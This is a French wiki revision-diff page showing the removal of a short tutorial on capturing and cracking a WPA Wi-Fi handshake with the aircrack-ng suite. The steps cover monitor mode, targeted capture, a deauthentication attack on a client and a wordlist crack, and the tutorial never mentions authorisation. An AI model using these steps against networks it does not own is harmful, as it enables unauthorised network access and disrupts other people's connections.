Ci-dessous, les différences entre deux révisions de la page.
reseau:recuperer_un_handshake_wpa [2016/04/15 12:33] arkinar |
reseau:recuperer_un_handshake_wpa [2016/07/04 08:38] |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
- | **WPA** | ||
- | Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi. | ||
- | Le WPA était une norme temporaire pour palier au manque de sécurité du WEP. Il a été implementé dans l'idée d'être remplacé par le WPA2. | ||
- | |||
- | Il utilise deux types d'authentifications : | ||
- | |||
- | - TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet. | ||
- | |||
- | - CCMP : un mécanisme de chiffrement qui s'appuie sur AES et qui est plus robuste que le TKIP. | ||
- | |||
- | |||
- | __Vocabulaire utilisé :__ | ||
- | |||
- | - BSSID : est l'adresse mac du point d'accès wifi. | ||
- | |||
- | - ESSID : est le nom du reseau wifi (exemple: Bbox-AFXXX) | ||
- | |||
- | - Handshake : est un échange de clé entre un routeur wifi et un client. | ||
- | |||
- | - Channel : est le canal sur lequel est diffusé le reseau wifi. | ||
- | |||
- | Sur les réseaux des particuliers le WPA PSK est utilisé (Preshared key). | ||
- | |||
- | Il utilise le TKIP comme authentification. | ||
- | |||
- | |||
- | Pour commencer assurez vous que votre carte wifi supporte le monitoring. | ||
- | |||
- | Pour l'activer : | ||
- | |||
- | <code>airmon-ng start wlan0</code> | ||
- | |||
- | Dans mon cas wlan0 est mon interface wifi. | ||
- | |||
- | Nous allons ensuite lister les wifi en WPA : | ||
- | |||
- | <code>airodump-ng --encrypt wpa mon0 </code> | ||
- | |||
- | --encrypt permet de filtrer les réseaux wifi par chiffrement | ||
- | |||
- | |||
- | mon0 est notre interface de monitoring | ||
- | |||
- | Pour obtenir un station : | ||
- | |||
- | <code>airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface]</code> | ||
- | |||
- | Dès qu'une station apparait : | ||
- | |||
- | <code>aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface]</code> | ||
- | |||
- | augmenter le 1 si ça n'a pas suffit à obtenir un handshake. | ||
- | |||
- | Pour vérifier si le handshake est capturé ,lancez | ||
- | |||
- | <code>aircrack-ng outfile.cap</code> | ||
- | |||
- | __pour obtenir la clé :__ | ||
- | |||
- | <code>aircrack -w dictionnaire -b [bssid] outfile.cap </code> |